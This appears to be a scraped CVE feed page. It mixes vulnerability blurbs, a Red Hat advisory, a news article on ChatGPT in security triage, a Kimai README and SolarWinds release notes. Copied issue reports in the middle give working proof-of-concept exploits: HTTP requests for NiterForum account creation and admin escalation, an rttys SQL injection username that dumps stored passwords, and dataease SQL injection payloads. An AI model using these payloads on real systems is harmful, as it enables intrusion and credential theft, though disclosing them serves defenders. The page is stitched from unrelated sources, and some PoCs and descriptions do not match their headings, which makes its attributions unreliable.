Due to improper parameter filtering in the sequalize js library, can a attacker peform injection.

CVE-2023-22579: Redirecting…

Due to improper artibute filtering in the sequalize js library, can a attacker peform SQL injections.

CVE-2023-22578: Redirecting…

Due to improper input filtering in the sequalize js library, can malicious queries lead to sensitive information disclosure.

CVE-2023-22580: Redirecting…

An update is now available for Red Hat build of Eclipse Vert.x.
Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability. For more information, see the CVE pages listed in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.

Related CVEs:
* CVE-2022-41854: Those using Snakeyaml to parse untrusted YAML files may be vulnerable to Denial of Service attacks (DOS). If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stack overflow. This effect may support a denial of service attack.
* CVE-2022-41881: A flaw was found in codec-haproxy from the Netty project. This flaw allows an attacker to build a malformed crafted message and cause infinite recursion, causing stack exhaustion and leading to a denial of service (DoS).


Skip to navigation Skip to main content

**Utilities**

*   Subscriptions
*   Downloads
*   Containers
*   Support Cases

**Infrastructure and Management**

*   Red Hat Enterprise Linux
*   Red Hat Virtualization
*   Red Hat Identity Management
*   Red Hat Directory Server
*   Red Hat Certificate System
*   Red Hat Satellite
*   Red Hat Subscription Management
*   Red Hat Update Infrastructure
*   Red Hat Insights
*   Red Hat Ansible Automation Platform

**Cloud Computing**

*   Red Hat OpenShift
*   Red Hat CloudForms
*   Red Hat OpenStack Platform
*   Red Hat OpenShift Container Platform
*   Red Hat OpenShift Data Science
*   Red Hat OpenShift Online
*   Red Hat OpenShift Dedicated
*   Red Hat Advanced Cluster Security for Kubernetes
*   Red Hat Advanced Cluster Management for Kubernetes
*   Red Hat Quay
*   OpenShift Dev Spaces
*   Red Hat OpenShift Service on AWS

**Storage**

*   Red Hat Gluster Storage
*   Red Hat Hyperconverged Infrastructure
*   Red Hat Ceph Storage
*   Red Hat OpenShift Data Foundation

**Runtimes**

*   Red Hat Runtimes
*   Red Hat JBoss Enterprise Application Platform
*   Red Hat Data Grid
*   Red Hat JBoss Web Server
*   Red Hat Single Sign On
*   Red Hat support for Spring Boot
*   Red Hat build of Node.js
*   Red Hat build of Thorntail
*   Red Hat build of Eclipse Vert.x
*   Red Hat build of OpenJDK
*   Red Hat build of Quarkus

**Integration and Automation**

*   Red Hat Process Automation
*   Red Hat Process Automation Manager
*   Red Hat Decision Manager

All Products

Issued:

2023-02-16

Updated:

2023-02-16

**RHSA-2023:0577 - Security Advisory**

*   Overview
*   Updated Packages

**Synopsis**

Moderate: Red Hat build of Eclipse Vert.x 4.3.7 security update

**Type/Severity**

Security Advisory: Moderate

**Topic**

An update is now available for Red Hat build of Eclipse Vert.x.  

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability. For more information, see the CVE pages listed in the References section.

**Description**

This release of Red Hat build of Eclipse Vert.x 4.3.7 GA includes security updates. For more information, see the release notes listed in the References section.  

Security Fix(es):  

*   codec-haproxy: HAProxyMessageDecoder Stack Exhaustion DoS (CVE-2022-41881)
*   dev-java-snakeyaml: dev-java/snakeyaml: DoS via stack overflow (CVE-2022-41854)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgements, and other related information, refer to the CVE page(s) listed in the References section.

**Solution**

Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.  

The References section of this erratum contains a download link for the update. You must be logged in to download the update.

**Affected Products**

*   Red Hat Openshift Application Runtimes Text-Only Advisories x86\_64

**Fixes**

*   BZ - 2151988 - CVE-2022-41854 dev-java/snakeyaml: DoS via stack overflow
*   BZ - 2153379 - CVE-2022-41881 codec-haproxy: HAProxyMessageDecoder Stack Exhaustion DoS

**References**

*   https://access.redhat.com/security/updates/classification/#moderate
*   https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?downloadType=distributions&product=catRhoar.eclipse.vertx&version=4.3.7
*   https://access.redhat.com/documentation/en-us/red\_hat\_build\_of\_eclipse\_vert.x/4.3/html/release\_notes\_for\_eclipse\_vert.x\_4.3/index

**Red Hat Openshift Application Runtimes Text-Only Advisories**

SRPM

x86\_64

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/.

RHSA-2023:0577: Red Hat Security Advisory: Red Hat build of Eclipse Vert.x 4.3.7 security update

Incident response triage and software vulnerability discovery are two areas where the large language model has demonstrated success, although false positives are common.

A number of experiments suggest that ChatGPT, the popular large language model (LLM), could be useful to help defenders triage potential security incidents and find security vulnerabilities in code, even though the artificial intelligence (AI) model was not specifically trained for such activities, according to results released this week.

In a Feb. 15 analysis of ChatGPT's utility as an incident response tool, Victor Sergeev, incident response team lead at Kaspersky, found that ChatGPT could identify malicious processes running on compromised systems. Sergeev infected a system with the Meterpreter and PowerShell Empire agents, took common steps in the role of an adversary, and then ran a ChatGPT-powered scanner against the system.

The LLM identified two malicious processes running on the system, and correctly ignored 137 benign processes, potentially reducing overhead to a significant degree, he wrote in a blog post describing the experiment.

"ChatGPT successfully identified suspicious service installations, without false positives," Sergeev wrote. "For the second service, it provided a conclusion about why the service should be classified as an indicator of compromise."

Security researchers and AI hackers have all taken an interest in ChatGPT, probing the LLM for weaknesses, while other researchers, as well as cybercriminals, have attempted to lure the LLM to the dark side, setting it to produce better phishing emails messages or generate malware.

    

ChatGPT found indicators of compromise with some false positives. Source: Kaspersky

Yet security researchers are also looking at how the generalized language model performs on specific defense-related tasks. In December, digital forensics firm Cado Security used ChatGPT to create a timeline of a compromise using JSON data from an incident, which produced a good — but not totally accurate — report. Security consultancy NCC Group experimented with ChatGPT as a way to find vulnerabilities in code, which it did, but not always accurately.

The conclusion is that security analysts, developers, and reverse engineers need to take care whenever using LLMs, especially for tasks outside the scope of their capabilities, says Chris Anley, chief scientist at security consultancy NCC Group.

"I definitely think that professional developers, and other folks who work with code should explore ChatGPT and similar models, but more for inspiration than for absolutely correct, factual results," he says, adding that "security code review isn't something we should be using ChatGPT for, so it's kind of unfair to expect it to be perfect first time out."

**Analyzing IoCs With AI**

The Kaspersky experiment started with asking ChatGPT about several hackers' tools, such as Mimikatz and Fast Reverse Proxy. The AI model successfully described those tools, but when requested to identify well-known hashes and domains, it failed. The LLM could not identify a well-known hash of the WannaCry malware, for example.

The relative success of identifying malicious code on the host, however, led Kasperky's Sergeev to ask ChatGPT to create a PowerShell script to collect metadata and indicators of compromise from a system and submit them to the LLM. After improving the code manually, Sergeev used the script on the infected test system.

Overall, the Kaspersky analyst used ChatGPT to analyze the metadata for more than 3,500 events on the test system, finding 74 potential indicators of compromise, 17 of which were false positives. The experiment suggests that ChatGPT could be useful for collecting forensics information for companies that are not running an endpoint detection and response (EDR) system, detecting code obfuscation, or reverse engineering code binaries.

Sergeev also warned that inaccuracies are a very real problem. "Beware of false positives and false negatives that this can produce," he wrote. "At the end of the day, this is just another statistical neural network prone to producing unexpected results."

In its analysis, Cado Security warned that ChatGPT typically does not qualify the confidence of its results. "This is a common concern with ChatGPT that OpenAI \[has\] raised themselves — it can hallucinate, and when it does hallucinate, it does so with confidence," Cado's analysis stated.

**Fair Use and Privacy Rules Need Clarifying**

The experiments also raise some critical issues regarding the data submitted to OpenAI's ChatGPT system. Already, companies have started taking exception to the creation of datasets using information on the Internet, with companies such as Clearview AI and Stability AI facing lawsuits seeking to curtail their use of their machine learning models.

Privacy is another issue. Security professionals have to determine whether submitted indicators of compromise expose sensitive data, or if submitting software code for analysis violates a company's intellectual property, says NCC Group's Anley.

"Whether it's a good idea to submit code to ChatGPT depends a lot on the circumstances," he says. "A lot of code is proprietary and is under various legal protections, so I wouldn't recommend that people submit code to third parties unless they have permission to do so."

Sergeev issued a similar warning: Using ChatGPT to detect compromise sends sensitive data to the system by necessity, which could be a violation of company policy and may present a business risk.

"By using these scripts, you send data, including sensitive data, to OpenAI," he stated, "so be careful and consult the system owner beforehand."

ChatGPT Subs In as Security Analyst, Hallucinates Only Occasionally

An issue was discovered in NiterForum version 2.5.0-beta in /src/main/java/cn/niter/forum/api/SsoApi.java and /src/main/java/cn/niter/forum/controller/AdminController.java, allows attackers to gain escalated privileges.

**Vulnerability Details****Any registered user**

code:  
/NiterForum/src/main/java/cn/niter/forum/api/SsoApi.java row68-83：

    @ResponseBody//@ResponseBody返回json格式的数据
    @RequestMapping(value = "/register", method = RequestMethod.POST)
    public Object register(HttpServletRequest request,
                        @RequestParam("name") String name,
                        @RequestParam("password") String password,
                        @RequestParam("type") Integer type,
                        HttpServletResponse response) {
        //1为手机号，2为邮箱号
        ResultDTO resultDTO = (ResultDTO)userService.register(type,name,password);
        if(200\==resultDTO.getCode()){
            Cookie cookie = cookieUtils.getCookie("token",""+resultDTO.getData(),86400\*3);
            response.addCookie(cookie);
        }
        return resultDTO;
    }

Any user can add users through this interface  

return：  
{"typ":"JWT","alg":"HS256"}{"vipRank":0,"avatarUrl":"/images/avatar/8.jpg","groupId":1,"iss":"NiterUser","name":"邮箱用户_h5ith","id":776,"exp":1661850834}  
query database，successfully added：  

**Add administrator without authority**

at  
NiterForum/src/main/java/cn/niter/forum/controller/AdminController.java row 113-136：

    @PostMapping("/user2588/setAdmin/id")
    @ResponseBody
    public Map<String,Object\> setQuestionById(HttpServletRequest request,
                                              @RequestParam(name = "id",defaultValue = "0") Long id) {

        UserDTO user = (UserDTO)request.getAttribute("loginUser");
        //UserAccount userAccount = (UserAccount) request.getSession().getAttribute("userAccount");
        if (user == null) {
            throw new CustomizeException(CustomizeErrorCode.NO\_LOGIN);
        }
        Map<String,Object\> map  = new HashMap<>();
        UserAccount userAccount = new UserAccount();
        userAccount.setGroupId(19);
        UserAccountExample userAccountExample = new UserAccountExample();
        userAccountExample.createCriteria().andUserIdEqualTo(id);
        if(userAccountMapper.updateByExampleSelective(userAccount,userAccountExample)==1){
            map.put("code",200);
            map.put("message","恭喜您，设置成功！");
        }
        return map;

    }
}

This interface does not perform permission verification, and any user can access it after logging in.  

**POC:****Any registered user**

POST /api/sso/register HTTP/1.1  
Host: 127.0.0.1:8080  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0  
Accept: _/_  
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
X-Requested-With: XMLHttpRequest  
Content-Length: 40  
Origin: http://127.0.0.1:8080  
Connection: close  
Referer: http://127.0.0.1:8080/sso/register  
Cookie:  
Sec-Fetch-Dest: empty  
Sec-Fetch-Mode: cors  
Sec-Fetch-Site: same-origin

name=123@123.com&password=123456&type=2

**Add administrator without authority**

POST /api/sso/register HTTP/1.1  
Host: 127.0.0.1:8080  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0  
Accept: _/_  
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
X-Requested-With: XMLHttpRequest  
Content-Length: 40  
Origin: http://127.0.0.1:8080  
Connection: close  
Referer: http://127.0.0.1:8080/sso/register  
Cookie:  
Sec-Fetch-Dest: empty  
Sec-Fetch-Mode: cors  
Sec-Fetch-Site: same-origin

name=123@123.com&password=123456&type=2

CVE-2022-38935: There is a vulnerability that can add the administrator account · Issue #25 · yourkevin/NiterForum

SQL Injection vulnerability in rttys versions 4.0.0, 4.0.1, and 4.0.2 in api.go, allows attackers to execute arbitrary code.

**Summary**

SQL injection occurs on the server side of rtty: rttys.

**Affected Version: v4.0.0<= rttys <= v4.0.2**  
**Attacker could register a malformed account in server side, logged in and trigger the SQL injection.**

I tried to contact to you using huntr platform, but it seems not work, so I post the security issue here.

**Analysis**

The sink point occurs on the /devs api route:

    //api.go
    authorized.GET("/devs", func(c *gin.Context) {
    		type DeviceInfo struct {
    			ID          string `json:"id"`
    			Connected   uint32 `json:"connected"`
    			Uptime      uint32 `json:"uptime"`
    			Description string `json:"description"`
    			Bound       bool   `json:"bound"`
    			Online      bool   `json:"online"`
    		}
    
    		db, err := instanceDB(cfg.DB)
    		if err != nil {
    			log.Error().Msg(err.Error())
    			c.Status(http.StatusInternalServerError)
    			return
    		}
    		defer db.Close()
    
    		sql := "SELECT id, description, username FROM device"
    
    		if cfg.LocalAuth || !isLocalRequest(c) {
    			username := getLoginUsername(c)
    			if username == "" {
    				c.Status(http.StatusUnauthorized)
    				return
    			}
    
    			if !isAdminUsername(cfg, username) {
    				sql += fmt.Sprintf(" WHERE username = '%s'", username)
    			}
    		}
    

At the end of the above code snippet, sql += fmt.Sprintf(" WHERE username = '%s'", username), '%s' shows that username is delivered to SQL statement without sanitized. If we could control username variable，then SQL injection could be exploited. Coincidentally there is no sanitization of username when attacker register malformed account.

The source point occurs on username at /signup api route.

Meanwhile, if !isAdminUsername(cfg, username){ shows that only general username could trigger the SQL injection, that is good for attack.

**Proof of Concept**

1.Create a docker environment locally, using the docker command recommended.  
sudo docker run -it -p 5912:5912 -p 5913:5913 zhaojh329/rttys:latest

2.Access the Web panel opened in http://ip:5913/, click Sign up to register new user. Because it is a docker demo, we have to register a admin account firstly.

3.After registered admin username, then attacker register a new malformed username xyz' union select username,password,3 from account-- with any password like SecurityTest

4.Attacker logged in with username xyz' union select username,password,3 from account--successfully, we could find that the **password of admin and other users** is showing, which is the result of exploit of SQL injection. As is showing below

CVE-2022-38867: Security issue: SQL injection in zhaojh329/rttys · Issue #117 · zhaojh329/rttys

SQL Injection vulnerability in dataease before 1.2.0, allows attackers to gain sensitive information via the orders parameter to /api/sys_msg/list/1/10.

\*\*DataEase \*\*  
1.1.0-rc2

**Bug 描述**  
SQL Injection

\*\*Bug \*\*  
url:/api/sys\_msg/list/1/10

    POST /api/sys_msg/list/1/10 HTTP/1.1
    Host: demo.dataease.io
    Cookie: sysUiInfo={%22ui.logo%22:{%22paramKey%22:%22ui.logo%22%2C%22paramValue%22:null%2C%22type%22:%22file%22%2C%22sort%22:1%2C%22file%22:null%2C%22fileName%22:null}%2C%22ui.loginLogo%22:{%22paramKey%22:%22ui.loginLogo%22%2C%22paramValue%22:null%2C%22type%22:%22file%22%2C%22sort%22:2%2C%22file%22:null%2C%22fileName%22:null}%2C%22ui.loginImage%22:{%22paramKey%22:%22ui.loginImage%22%2C%22paramValue%22:null%2C%22type%22:%22file%22%2C%22sort%22:3%2C%22file%22:null%2C%22fileName%22:null}%2C%22ui.loginTitle%22:{%22paramKey%22:%22ui.loginTitle%22%2C%22paramValue%22:%22%E4%BA%BA%E4%BA%BA%E5%8F%AF%E7%94%A8%E7%9A%84%E5%BC%80%E6%BA%90%E6%95%B0%E6%8D%AE%E5%8F%AF%E8%A7%86%E5%8C%96%E5%88%86%E6%9E%90%E5%B7%A5%E5%85%B7%22%2C%22type%22:%22text%22%2C%22sort%22:4%2C%22file%22:null%2C%22fileName%22:null}%2C%22ui.title%22:{%22paramKey%22:%22ui.title%22%2C%22paramValue%22:%22%22%2C%22type%22:%22text%22%2C%22sort%22:5%2C%22file%22:null%2C%22fileName%22:null}%2C%22ui.favicon%22:{%22paramKey%22:%22ui.favicon%22%2C%22paramValue%22:null%2C%22type%22:%22file%22%2C%22sort%22:6%2C%22file%22:null%2C%22fileName%22:null}%2C%22ui.demo.tips%22:{%22paramKey%22:%22ui.demo.tips%22%2C%22paramValue%22:%22user:%20demo%20password:%20dataease%22%2C%22type%22:%22text%22%2C%22sort%22:100%2C%22file%22:null%2C%22fileName%22:null}}; language=zh_CN; Authorization=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2MjgwNDI1MDgsInVzZXJJZCI6MiwidXNlcm5hbWUiOiJkZW1vIn0.zxOvmJQ_SRyahe5yJjrhMCSp_mUzNF88iF4yrZKZ2OA
    Content-Length: 65
    Sec-Ch-Ua: "Chromium";v="92", " Not A;Brand";v="99", "Google Chrome";v="92"
    Link-Pwd-Token: undefined
    Accept-Language: zh-CN
    Sec-Ch-Ua-Mobile: ?0
    Authorization: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2MjgwNDI1MDgsInVzZXJJZCI6MiwidXNlcm5hbWUiOiJkZW1vIn0.zxOvmJQ_SRyahe5yJjrhMCSp_mUzNF88iF4yrZKZ2OA
    Content-Type: application/json;charset=UTF-8
    Accept: application/json, text/plain, */*
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
    Origin: https://demo.dataease.io
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: https://demo.dataease.io/?
    Accept-Encoding: gzip, deflate
    Connection: close
    
    {"orders":["(select*from(select+sleep(10)union/**/select+1)a) "]}
    

  
  
payload：extractvalue('anything',concat('~',(select database())))

CVE-2021-38239: [Bug]SQL Injection · Issue #510 · dataease/dataease

Cross Site Scripting (XSS) vulnerability in kevinpapst kimai2 1.30.0 in /src/Twig/Runtime/MarkdownExtension.php, allows attackers to gain escalated privileges.

    

**Kimai - time-tracker**

Kimai is a professional grade time-tracking application, free and open-source. It handles use-cases of freelancers as well as companies with dozens or hundreds of users. Kimai was build to track your project times and ships with many advanced features, including but not limited to:

JSON API, invoicing, data exports, multi-timer and punch-in punch-out mode, tagging, multi-user - multi-timezones - multi-language (over 30 translations existing!), authentication via SAML/LDAP/Database, two-factor authentication (2FA) with TOTP, customizable role and team permissions, responsive design, user/customer/project specific rates, advanced search & filtering, money and time budgets, advanced reporting, support for plugins and so much more.

**Versions**

There are two versions of Kimai existing:

*   Version 1 — compatible with PHP 7.4, which is in maintenance mode since 2023
*   Version 2 — stable and "almost released" (waiting for some major plugins, which are not yet migrated)

**Links**

*   Home — Kimai project homepage
*   Blog — Read the latest news
*   Documentation — Learn how to use Kimai

**Requirements**

*   PHP 8.1 minimum
*   MariaDB or MySQL
*   A webserver and subdomain (subdirectory is not supported)
*   PHP extensions: gd, intl, json, mbstring, pdo, tokenizer, xml, xsl, zip

**Installation**

*   Recommended setup — with Git and Composer
*   Docker — containerized by @tobybatch

There are also documentations for:

*   developer setups — on your local machine
*   shared hostings — the least favorable option
*   Synology — you could try to host the Docker version instead
*   1-click installer — hosted environments

And if you don't want to host Kimai, you can use the Cloud version of it.

**Updating Kimai**

*   Update Kimai — get the latest version
*   UPGRADING guide — version specific steps

**Plugins**

*   Plugin marketplace — find existing plugins here
*   Developer documentation — how to create a plugin

**Roadmap and releases**

You can see a rough development roadmap in the Milestones sections. It is open for changes and input from the community, your ideas and questions are welcome.

Release versions will be created on a regular basis, every couple of weeks latest. Every code change, whether it's a new feature or a bugfix, will be done on the main branch.

For the time being and until 2.0 is widely adopted, the 1.x branch will receive bug fixes.

**Contributing**

You want to contribute to this repository? This is so great! The best way to start is to open a new issue for bugs or feature requests or a discussion for questions, support and such.

In case you want to contribute, but you wouldn't know how, here are some suggestions:

*   Spread the word: More user means more people testing and contributing to Kimai, which in turn means better stability and more and better features. Please vote for Kimai on any software platform, you can toot or tweet about it, share it on LinkedIn, Reddit or any of your favorite social media platforms. Every bit helps!
*   Answer questions: You know the answer to another user's problem? Share your knowledge.
*   Something can be done better? An essential feature is missing? Create a feature request.
*   Report bugs makes Kimai better for everyone.
*   You don't have to be programmer, the documentation and translation could always use some attention.
*   Sponsor the project: free software costs money to create!

There is one simple rule in our "Code of conduct": Don't be an ass!

**Credits**

Kimai is based on modern technologies and frameworks such as PHP, Symfony and Doctrine, Bootstrap and Tabler, and countless others.

CVE-2020-19825: GitHub - kimai/kimai: Kimai is a web-based multi-user time-tracking application. Works great for everyone: freelancers, companies, organizations - everyone can track their times, generate reports, cre

Customers who had configured their polling to occur via Kerberos did not expect NTLM Traffic on their environment, but since we were querying for data via IP address this prevented us from utilizing Kerberos.

Release date: February 15, 2023

Last updated: February 17, 2023

These release notes describe the new features, improvements, and fixed issues in Server & Application Monitor 2023.1. They also provide information about upgrades and describe workarounds for known issues.

**Learn more**

*   For information on the latest hotfixes, see SAM Hotfixes.
*   For release notes for previous SAM versions, see Previous Version documentation.
*   For information about requirements, see SAM system requirements.
*   For information about working with SAM, see the SAM Administrator Guide.

**New features and improvements**

Return to top

SAM 2023.1 offers new features and improvements compared to previous releases of SAM.

See also the SolarWinds Platform 2023.1 Release Notes.

**New customer installation**

Return to top

For information about installing Server & Application Monitor, see the SolarWinds Platform Product Installation and Upgrade Guide.

**Before you upgrade!**

Return to top

SAM 2020.2.1 can be upgraded from versions 2020.1 and later. If you are running a version earlier than SAM 2020.2.1, please upgrade to SAM 2020.2.6 first and then upgrade to SAM 2023.1.

**How to upgrade**

Return to top

Go to Settings > My Deployment to initiate the upgrade. The SolarWinds Installer upgrades your entire deployment (all SolarWinds Platform products and any scalability engines).

You must be on SAM 2020.2.1 or later to upgrade to SAM 2023.1. If you are on SAM 2020.2 or earlier, first upgrade to 2020.2.6 and then upgrade to 2023.1.

**Fixed issues**

Return to top

SAM 2023.1 fixes the following issues.

 

Case number

Description

00666976

SAM 2020.2.1 no longer automatically upgrades Orion agents to .net 4.8.

00519354, 00574585, 00625367

The Component Details Widget no longer shows the <br> tag on the resource output.

00317146

The variable for warning and critical statistic threshold is now working for the Linux component.

01000359

The temp table column no longer shows the wrong data type.

00603123

The Start/Restart services buttons now work on the Component Details Widget.

SAM 2023.1 contains all of the fixed issues from the SolarWinds Platform 2023.1 release.

See the SolarWinds Platform 2023.1 Release Notes for more information.

**CVEs**

Return to top

SolarWinds would like to thank our Security Researchers below for reporting on the issue in a responsible manner and working with our security, product, and engineering teams to fix the vulnerability.

    

CVE-ID

Vulnerability Title

Descriptions

Severity

Credit

CVE-2022-47508

Disable NTLM: SAM 2022.4

Customers who had configured their polling to occur via Kerberos did not expect NTLM Traffic on their environment, but since we were querying for data via IP address this prevented us from utilizing Kerberos.

High

 

**Known issues**

Return to top

 

Issue

Notes

Bad Request error can appear when creating new API Poller.

As a workaround:

1.  Edit the API Poller that has a Bad request error.
    
2.  Click Configure.
    
3.  Turn off the Use custom polling interval option.
    
4.  Save the API Poller.
    

OpenJDK15 included with SAM, to connect to JBoss using JConsole with either protocol, remote+http or remoting-jmx, is resulting in errors.

Different versions of JBoss use different protocol, as shown below.

*   WildFly 8, 9, and 10 and JBoss EAP 7 use protocols: service:jmx:remote+http://ip:9990 or service:jmx:remote+https://ip:9994
    
*   JBoss EAP 6 and JBoss AS 7 use protocol: service:jmx:remoting-jmx://ip:9999
    
*   JBoss EAP 5.2 and JBoss AS 6.1 use protocol: service:jmx:rmi:///jndi/rmi://ip:1090/jmxrmi
    

In order for the SAM JMX Monitor to connect, copy the jboss-cli-client.jar provided by the JBoss EAP installation to a location in SolarWinds Platform. Add the path location in jsl64.ini and then restart the JMXBridge service through Orion Service Manager.

If using JConsole to connect to a remote JBoss server for testing or troubleshooting purposes, install the latest JDK version on SolarWinds Platform server that supports jconsole.jar, and make sure JConsole uses the new JDK path.

When adding Exchange 2016 node to be monitored via WMI polling method, Exchange AppInsight is not discovered and the wizard hangs.

As a workaround, complete these steps.

In the Add node Wizard:

1.  Choose ICMP polling method.
    
2.  Finish the wizard.
    
3.  Manually assign Exchange AppInsight.
    
4.  Choose Agent polling method.
    

In Network Discovery, avoid discovering Exchange 2016 nodes via WMI. Before discovery, add them as described under Add node Wizard above.

**End of life notices**

Return to top

   

Version

EoL Announcement

EoE Effective Date

EoL Effective Date

2020.2.6

**April 18, 2023**: End-of-Life (EoL) announcement – Customers on SAM 2020.2.6 should begin transitioning to the latest version of SAM.

**May 18, 2023**: End-of-Engineering (EoE) – Service releases, bug fixes, workarounds, and service packs for SAM 2020.2.6 will no longer be actively supported by SolarWinds.

**May 18, 2024**: End-of-Life (EoL) – SolarWinds will no longer provide technical support for SAM 2020.2.6

2020.2.5

**January 18, 2023**: End-of-Life (EoL) announcement – Customers on SAM 2020.2.5 should begin transitioning to the latest version of SAM.

**February 17, 2023**: End-of-Engineering (EoE) – Service releases, bug fixes, workarounds, and service packs for SAM 2020.2.5 will no longer be actively supported by SolarWinds.

**February 17, 2024**: End-of-Life (EoL) – SolarWinds will no longer provide technical support for SAM 2020.2.5.

2020.2.4

**October 19, 2022**: End-of-Life (EoL) announcement – Customers on SAM 2020.2.4 should begin transitioning to the latest version of SAM.

**November 18, 2022**: End-of-Engineering (EoE) – Service releases, bug fixes, workarounds, and service packs for SAM 2020.2.4 will no longer be actively supported by SolarWinds.

**November 18, 2023**: End-of-Life (EoL) – SolarWinds will no longer provide technical support for SAM 2020.2.4.

2020.2.1

**October 19, 2022**: End-of-Life (EoL) announcement – Customers on SAM 2020.2.1 should begin transitioning to the latest version of SAM.

**November 18, 2022**: End-of-Engineering (EoE) – Service releases, bug fixes, workarounds, and service packs for SAM 2020.2.1 will no longer be actively supported by SolarWinds.

**November 18, 2023**: End-of-Life (EoL) – SolarWinds will no longer provide technical support for SAM 2020.2.1.

2020.2

**October 19, 2022**: End-of-Life (EoL) announcement – Customers on SAM 2020.2 should begin transitioning to the latest version of SAM.

**November 18, 2022**: End-of-Engineering (EoE) – Service releases, bug fixes, workarounds, and service packs for SAM 2020.2 will no longer be actively supported by SolarWinds.

**November 18, 2023**: End-of-Life (EoL) – SolarWinds will no longer provide technical support for SAM 2020.2.

2019.4

**July 27, 2022**: End-of-Life (EoL) announcement - Customers on SAM version 2019.4 should begin transitioning to the latest version of SAM.

  **August 26, 2022**: End-of-Engineering (EoE) - Service releases, bug fixes, workarounds, and service packs for SAM version 2019.4 will no longer be actively supported by SolarWinds.

**August 26, 2023**: End-of-Life (EoL) - SolarWinds will no longer provide technical support for SAM version 2019.4.

6.9.1

**July 27, 2022**: End-of-Life (EoL) announcement - Customers on SAM version 6.9.1 should begin transitioning to the latest version of SAM.

  **August 26, 2022**: End-of-Engineering (EoE) - Service releases, bug fixes, workarounds, and service packs for SAM version 6.9.1 will no longer be actively supported by SolarWinds.

**August 26, 2023**: End-of-Life (EoL) - SolarWinds will no longer provide technical support for SAM version 6.9.1.

6.9

**July 27, 2022**: End-of-Life (EoL) announcement - Customers on SAM version 6.9 should begin transitioning to the latest version of SAM.

  **August 26, 2022**: End-of-Engineering (EoE) - Service releases, bug fixes, workarounds, and service packs for SAM version 6.9 will no longer be actively supported by SolarWinds.

**August 26, 2023**: End-of-Life (EoL) - SolarWinds will no longer provide technical support for SAM version 6.9.

See the End of Life Policy for information about SolarWinds product lifecycle phases. For supported versions and EoL announcements for all SolarWinds products, see Currently supported software versions.

**Legal notices**

Return to top

© 2023 SolarWinds Worldwide, LLC. All rights reserved.

This document may not be reproduced by any means nor modified, decompiled, disassembled, published or distributed, in whole or in part, or translated to any electronic medium or other means without the prior written consent of SolarWinds. All right, title, and interest in and to the software, services, and documentation are and shall remain the exclusive property of SolarWinds, its affiliates, and/or its respective licensors.

SOLARWINDS DISCLAIMS ALL WARRANTIES, CONDITIONS, OR OTHER TERMS, EXPRESS OR IMPLIED, STATUTORY OR OTHERWISE, ON THE DOCUMENTATION, INCLUDING WITHOUT LIMITATION NONINFRINGEMENT, ACCURACY, COMPLETENESS, OR USEFULNESS OF ANY INFORMATION CONTAINED HEREIN. IN NO EVENT SHALL SOLARWINDS, ITS SUPPLIERS, NOR ITS LICENSORS BE LIABLE FOR ANY DAMAGES, WHETHER ARISING IN TORT, CONTRACT OR ANY OTHER LEGAL THEORY, EVEN IF SOLARWINDS HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.

The SolarWinds, SolarWinds & Design, Orion, and THWACK trademarks are the exclusive property of SolarWinds Worldwide, LLC or its affiliates, are registered with the U.S. Patent and Trademark Office, and may be registered or pending registration in other countries. All other SolarWinds trademarks, service marks, and logos may be common law marks or are registered or pending registration. All other trademarks mentioned herein are used for identification purposes only and are trademarks of (and may be registered trademarks) of their respective companies.

Tag

#js